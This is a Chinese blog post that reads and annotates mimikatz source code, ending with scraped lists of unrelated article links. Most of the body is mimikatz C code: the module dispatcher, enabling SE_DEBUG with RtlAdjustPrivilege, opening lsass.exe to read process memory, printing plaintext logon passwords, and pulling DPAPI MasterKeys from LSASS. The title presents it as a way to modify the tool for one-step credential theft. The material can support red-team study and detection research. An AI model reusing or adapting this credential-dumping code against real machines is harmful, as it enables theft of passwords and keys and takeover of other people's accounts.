1、前言

mimikatz框架是非常精妙的,粗浅讲一下修改的思路。

它的模块主要由各个结构体数组组成,根据传入的命令搜索执行相应命令的模块

mimikatz.c 部分代码:

NTSTATUS mimikatz_doLocal(wchar_t * input)

{

        NTSTATUS status = STATUS_SUCCESS;

        // 参数个数定义

        int argc;

        // 获取输入的值,参数个数赋值

        //

        wchar_t ** argv = CommandLineToArgvW(input, &argc), *module = NULL, *command = NULL, *match;

        unsigned short indexModule, indexCommand;

        BOOL moduleFound = FALSE, commandFound = FALSE;

        if(argv && (argc > 0))

        {

                if(match = wcsstr(argv[0], L"::"))

                {

                        if(module = (wchar_t *) LocalAlloc(LPTR, (match - argv[0] + 1) * sizeof(wchar_t)))

                        {

                                if((unsigned int) (match + 2 - argv[0]) < wcslen(argv[0]))

                                        //提取::号的后半段字符

                                        command = match + 2;

                                //将argv[0]源内存块的内容复制到module目标内存块。

                                RtlCopyMemory(module, argv[0], (match - argv[0]) * sizeof(wchar_t));

                        }

                }

                else command = argv[0];

                // 索引值为0,如果moduleFound为1且索引值小于模块的数目,循环执行

                for(indexModule = 0; !moduleFound && (indexModule < ARRAYSIZE(mimikatz_modules)); indexModule++)

                        //查找模块

                        if(moduleFound = (!module || (_wcsicmp(module, mimikatz_modules[indexModule]->shortName) == 0)))

                                //查找命令

                                if(command)

                                        for(indexCommand = 0; !commandFound && (indexCommand < mimikatz_modules[indexModule]->nbCommands); indexCommand++)

                                                if(commandFound = _wcsicmp(command, mimikatz_modules[indexModule]->commands[indexCommand].command) == 0)

                                                        //调用相关模块函数

                                                        status = mimikatz_modules[indexModule]->commands[indexCommand].pCommand(argc - 1, argv + 1);

实际调用模块的方式

//模块调用,对应结构体

const KUHL_M * mimikatz_modules[] = {

        &kuhl_m_standard,

        &kuhl_m_crypto,

        &kuhl_m_sekurlsa,

        &kuhl_m_kerberos,

        &kuhl_m_privilege,

        &kuhl_m_process,

        &kuhl_m_service,

        &kuhl_m_lsadump,

        &kuhl_m_ts,

        &kuhl_m_event,

        &kuhl_m_misc,

        &kuhl_m_token,

        &kuhl_m_vault,

        &kuhl_m_minesweeper,

#ifdef NET_MODULE

        &kuhl_m_net,

#endif

        &kuhl_m_dpapi,

        &kuhl_m_busylight,

        &kuhl_m_sysenv,

        &kuhl_m_sid,

        &kuhl_m_iis,

        &kuhl_m_rpc,

};

如果要添加各种变量作为功能模块。在打开解决方案后,global files目录中的globals.h文件可以添加你设置的全局变量,实现全局调用。

提权函数部分

//提权函数调用

NTSTATUS kuhl_m_privilege_debug(int argc, wchar_t * argv[])

{

        return kuhl_m_privilege_simple(SE_DEBUG);

}

主要用更底层的函数,一行API实现进程提权。

NTSTATUS kuhl_m_privilege_simple(ULONG privId)

{

        ULONG previousState;

        NTSTATUS status;

        //提升权限

        //  RtlAdjustPrivilege(SE_DEBUG, TRUE, FALSE, &previousState);

        status = RtlAdjustPrivilege(privId, TRUE, FALSE, &previousState);

        if(NT_SUCCESS(status))

                kprintf(L"Privilege \'%u\' OK\n", privId);

        else

                PRINT_ERROR(L"RtlAdjustPrivilege (%u) %08x\n", privId, status);

        return status;

}

明文获取密码部分

NTSTATUS kuhl_m_sekurlsa_getLogonData(const PKUHL_M_SEKURLSA_PACKAGE * lsassPackages, ULONG nbPackages)

{

        KUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA OptionalData = {lsassPackages, nbPackages};

        return kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_logondata, &OptionalData);  //明文获取密码2

}

通过调试跟进,发现是从lsass.exe中dump出内存

        //根据版本指定调用进程优先级别的函数

        DWORD processRights = PROCESS_VM_READ | ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? PROCESS_QUERY_INFORMATION : PROCESS_QUERY_LIMITED_INFORMATION);

        BOOL isError = FALSE;

        if(!cLsass.hLsassMem)

        {

                status = STATUS_NOT_FOUND;

                if(NT_SUCCESS(lsassLocalHelper->initLocalLib()))

                {

                        if(pMinidumpName)

                        {

                                Type = KULL_M_MEMORY_TYPE_PROCESS_DMP;

                                kprintf(L"Opening : \'%s\' file for minidump...\n", pMinidumpName);

                                hData = CreateFile(pMinidumpName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);

                        }

                        else

                        {

                                Type = KULL_M_MEMORY_TYPE_PROCESS;

                                if(kull_m_process_getProcessIdForName(L"lsass.exe", &pid))

                                        hData = OpenProcess(processRights, FALSE, pid); //打开进程

                                else PRINT_ERROR(L"LSASS process not found (?)\n");

                        }

在NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData)的回调函数中输出已经获取的明文数据

                                                        //回传数据

                                                        retCallback = callback(&sessionData, pOptionalData); //明文密码获取3

明文密码打印位置

BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)

{

        PKUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA pLsassData = (PKUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA) pOptionalData;

        ULONG i;

        //PDWORD sub = NULL;

        if((pData->LogonType != Network)/* && pData->LogonType != UndefinedLogonType*/)

        {

                //if(IsValidSid(pData->pSid) && GetSidSubAuthorityCount(pData->pSid))

                //        sub = GetSidSubAuthority(pData->pSid, 0);

                //if(!sub || (*sub != 90 && *sub != 96))

                //{

                        //这个函数负责获取需要打印的数据

                        kuhl_m_sekurlsa_printinfos_logonData(pData);

                       //循环输出

                        for(i = 0; i < pLsassData->nbPackages; i++)

                        {

                                if(pLsassData->lsassPackages[i]->Module.isPresent && lsassPackages[i]->isValid)

                                {

                                        kprintf(L"\t%s :\t", pLsassData->lsassPackages[i]->Name);

                                        pLsassData->lsassPackages[i]->CredsForLUIDFunc(pData);

                                        kprintf(L"\n");

                                }

                        }

                //}

        }

        return TRUE;

}

获取远程会话终端凭据部分

NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[])

{

        kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_dpapi, NULL); //获取全部用户Guid

        return STATUS_SUCCESS;

}

在BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)处是存储会话的Guid和MasterKey所在的位置。



                        if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_MASTERKEY_CACHE_ENTRY)))

                                        {

                                                if(SecEqualLuid(pData->LogonId, &mesCredentials.LogonId))

                                                {

                                                        kprintf(L"\t [%08x]\n\t * GUID      :\t", monNb++);

                                                        kull_m_string_displayGUID(&mesCredentials.KeyUid); //获取Guid

                                                        kprintf(L"\n\t * Time      :\t"); kull_m_string_displayLocalFileTime(&mesCredentials.insertTime);

                                                        if(aKey.address = LocalAlloc(LPTR, mesCredentials.keySize))

                                                        {

                                                                aLsass.address = (PBYTE) aLsass.address + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key);

                                                                if(kull_m_memory_copy(&aKey, &aLsass, mesCredentials.keySize))

                                                                {

                                                                        (*pData->lsassLocalHelper->pLsaUnprotectMemory)(aKey.address, mesCredentials.keySize);

                                                                        kprintf(L"\n\t * MasterKey :\t"); kull_m_string_wprintf_hex(aKey.address, mesCredentials.keySize, 0);  //获取MasterKey

.....

2、效果图

执行多条命令

批量对比

【源码阅读】Mimikatz一键获取远程终端凭据与获取明文密码修改方法的更多相关文章

  1. [Go] gocron源码阅读-flag包实现命令行参数获取

    调用flag包可以方便的获取到命令行中传递的参数,比如可以实现类似nginx执行程序获取命令行参数执行不同操作的目标 package main import ( "flag" &q ...

  2. 【转】cJSON 源码阅读笔记

    前言 cjson 的代码只有 1000+ 行, 而且只是简单的几个函数的调用. 而且 cjson 还有很多不完善的地方, 推荐大家看完之后自己实现一个 封装好的功能完善的 cjson 程序. json ...

  3. 【源码阅读】Mimikatz相关资料

    Mimikatz GitHub (源码) https://github.com/gentilkiwi/mimikatz Mimikatz GitHub Wiki (包含了一些说明文档) https:/ ...

  4. 【安卓本卓】Android系统源码篇之(一)源码获取、源码目录结构及源码阅读工具简介

    前言        古人常说,“熟读唐诗三百首,不会作诗也会吟”,说明了大量阅读诗歌名篇对学习作诗有非常大的帮助.做开发也一样,Android源码是全世界最优秀的Android工程师编写的代码,也是A ...

  5. 【原】FMDB源码阅读(三)

    [原]FMDB源码阅读(三) 本文转载请注明出处 —— polobymulberry-博客园 1. 前言 FMDB比较优秀的地方就在于对多线程的处理.所以这一篇主要是研究FMDB的多线程处理的实现.而 ...

  6. 【原】FMDB源码阅读(二)

    [原]FMDB源码阅读(二) 本文转载请注明出处 -- polobymulberry-博客园 1. 前言 上一篇只是简单地过了一下FMDB一个简单例子的基本流程,并没有涉及到FMDB的所有方方面面,比 ...

  7. 【原】FMDB源码阅读(一)

    [原]FMDB源码阅读(一) 本文转载请注明出处 —— polobymulberry-博客园 1. 前言 说实话,之前的SDWebImage和AFNetworking这两个组件我还是使用过的,但是对于 ...

  8. 【原】AFNetworking源码阅读(六)

    [原]AFNetworking源码阅读(六) 本文转载请注明出处 —— polobymulberry-博客园 1. 前言 这一篇的想讲的,一个就是分析一下AFSecurityPolicy文件,看看AF ...

  9. 【原】AFNetworking源码阅读(五)

    [原]AFNetworking源码阅读(五) 本文转载请注明出处 —— polobymulberry-博客园 1. 前言 上一篇中提及到了Multipart Request的构建方法- [AFHTTP ...

随机推荐

  1. Alpha冲刺——事后诸葛亮

    组长博客 作业博客 项目Postmortem 设想和目标 我们的软件要解决什么问题?是否定义得很清楚?是否对典型用户和典型场景有清晰的描述? 我们的软件针对的是福大学子来到食堂会犹豫不决无法决定吃什么 ...

  2. 使用不同的namespace让不同的kafka/Storm连接同一个zookeeper

    背景介绍: 需要部署2个kafka独立环境,但是只有一个zookeeper集群. 需要部署2个独立的storm环境,但是只有一个zookeeper集群. ----------------------- ...

  3. 课堂final发布

    项目组名:奋斗吧兄弟 小组成员:黄兴.李俞寰.栾骄阳.王东涵.杜桥 今天6个小组在课上进行了Final发布,以下是我的一些看法: 1.Nice团队的约跑app: 今天Nice团队给我的最突出的印象就是 ...

  4. final版本发布评价II

    其实我对技术上的问题了解不多,所以有些评语可能说的不对或者压根就没啥用.可直接忽略.请见谅. 1新蜂的俄罗斯方块,UI设计虽然给出了背景和颜色,但是感觉色彩对比也不好,模块之间也不协调.没有更多的说服 ...

  5. Spring transaction与EJB transaction的关系

    TransactionDefinition Interface that defines Spring-compliant transaction properties. Based on the p ...

  6. Windows 下面简单的同步文件夹工具

    1. 微软自己的工具 下载地址 https://www.microsoft.com/en-us/download/confirmation.aspx?id=15155 2. 安装过程忽略 3. 配置与 ...

  7. [转帖]Mysql 开启跟踪的一个方法

    MySQL 事件跟踪器 , MySQL 无须重启服务 跟踪 SQL , 也无须配置日志 原博客地址: https://www.cnblogs.com/wuyifu/p/3328024.html 第一步 ...

  8. PSP(3.16——3.22)以及周记录

    3.17 13:30 14:45 15 60 讨论班 A Y min 14:50 17:05 5 130 得到设备 Cordova 蓝牙连接 A Y min 23:15 23:45 5 25 英语百词 ...

  9. OneZero第二周第四次站立会议(2016.3.31)

    会议时间:2016年3月30日  13:00~13:20 会议成员:冉华,张敏,王巍,夏一鸣. 会议目的:汇报前一天工作,全体成员评论,确定会后修改内容或分配下一步任务. 会议内容: 1.前端,夏.张 ...

  10. Java多线程1:进程和线程的区别

    之前看了2天的多线程,就不看了.现在继续拾起来吧.最近有点松散,多线程内容都是看毕向东的视频以及网络教程和各种书籍 什么是进程? 通俗一点讲,就是正在进行的程序,进程是操作系统控制的基本运行单元: 如 ...